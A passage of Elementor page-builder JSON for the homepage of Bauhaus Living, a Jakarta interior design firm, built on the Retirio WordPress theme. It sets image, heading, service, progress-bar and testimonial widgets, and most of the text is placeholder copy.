_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/armin-djuhic-mcL2f-J74GY-unsplash.jpg\",\"id\":2996,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/minh-pham-OtXADkUh3-I-unsplash.jpg\",\"id\":3001,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"LOREM IPSUM\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">LOREM IPSUM<\\/span><\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">Bauhaus Living is Jakarta based interior design consultant &amp; contractor established on 2005. We provide a full range of services of interior design: interior design concept, 3D image, technical drawing and production. <\\/span><\\/p>\",\"_margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"95d1537\",\"elType\":\"widget\",\"settings\":{\"text\":\"More\",\"background_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"40\",\"bottom\":\"20\",\"left\":\"40\",\"isLinked\":false},\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/about\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"700\",\"typography_text_transform\":\"uppercase\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_z_index\":2,\"_transform_keep_proportions_hover\":\"\",\"_transform_skewX_effect_hover\":{\"unit\":\"px\",\"size\":105,\"sizes\":[]},\"__dynamic__\":[]},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"89e3b46\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"background_color\":\"#F5F5F5\",\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-service-home-1.png\",\"id\":3938,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"center center\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_size\":\"cover\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.05,\"sizes\":[]},\"overlay_blend_mode\":\"darken\",\"padding\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_background\":\"classic\"},\"elements\":[{\"id\":\"689d32b\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"6fd54ec\",\"elType\":\"section\",\"settings\":{\"gap\":\"no\",\"structure\":\"20\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"25\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"ova-flip\",\"animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"animation_delay\":500},\"elements\":[{\"id\":\"afefcf5\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":57.862},\"elements\":[{\"id\":\"41871d7\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"SERVICES WE DO\",\"title\":\"\\nOur highlighted services\\nfor interior design\",\"align_heading\":\"left\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":true},{\"id\":\"8ca80a9\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":42.097,\"align\":\"flex-start\",\"margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"67cca64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Duis mollis varius quam sed congue. Aliquam porttitor  ultricies porttitor elementum. Nullam pretium id massa ut placerat. Class aptent taciti sociosqu ad litora.\",\"text_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":true}],\"isInner\":true},{\"id\":\"f665bb7\",\"elType\":\"widget\",\"settings\":{\"number_column\":\"four_column\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-120\",\"left\":\"0\",\"isLinked\":false},\"_animation\":\"pulse\",\"_animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"post_per_page\":3,\"order_by\":\"ova_sev_met_order_sev\",\"order\":\"ASC\"},\"elements\":[],\"widgetType\":\"ovasev_elementor_service_box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0da118d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5d9734c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"77ba3ef\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":100,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b51484b\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"-15\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3d8a96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0f00906\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our recent work\",\"title\":\"Introducing outstanding new projects\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"b4fd990\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"ova_elementor_project_filter_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"145a686\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/bg-whychoose.png\",\"id\":2116,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center left\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"gap\":\"no\",\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"8460a70\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":45,\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"80\",\"bottom\":\"120\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"space_between_widgets\":15},\"elements\":[{\"id\":\"5229c85\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"our benefits\",\"title\":\"Why choose ?\",\"description\":\"There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration in some form.\\n\",\"align_heading\":\"left\",\"color_title\":\"#FFFFFF\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"color_sub_title\":\"#B1B1B1\",\"color_description\":\"#C2C2C2\",\"show_line_text\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"e6bce61\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"Architecture business solutions\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"7113fdf\"},{\"text\":\"Top quality services with reasonable price\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"e6ab069\"},{\"text\":\"Reliable & experienced architecture & designers\",\"selected_icon\":{\"value\":\"ovaicon ovaicon-next-5\",\"library\":\"ovaicon\"},\"_id\":\"5d551b6\"}],\"icon_color\":\"#E3B25A\",\"icon_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"text_color\":\"#FFFFFF\",\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"icon_typography_font_weight\":\"600\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"16\",\"left\":\"0\",\"isLinked\":false},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":0.6,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"icon-list\"},{\"id\":\"9c7a64c\",\"elType\":\"widget\",\"settings\":{\"title\":\"Archirecture\",\"percent\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"bar_border_radius\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"},{\"id\":\"042a87b\",\"elType\":\"widget\",\"settings\":{\"title\":\"Designing\",\"percent\":{\"unit\":\"%\",\"size\":60,\"sizes\":[]},\"inner_text\":\"\",\"bar_color\":\"#E3B25A\",\"bar_bg_color\":\"#3A3A3A\",\"bar_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"title_color\":\"#FFFFFF\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":19,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"2ae20b7\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":55,\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"center center\",\"background_repeat\":\"no-repeat\",\"background_size\":\"contain\",\"css_classes\":\"retirio_stretch_column_right\",\"_inline_size_tablet\":100,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"ca11226\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/image-why-choose.jpg\",\"id\":2090,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"width_tablet\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":580,\"sizes\":[]},\"object-fit_tablet\":\"cover\",\"image_size\":\"full\",\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":800,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"458230c\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_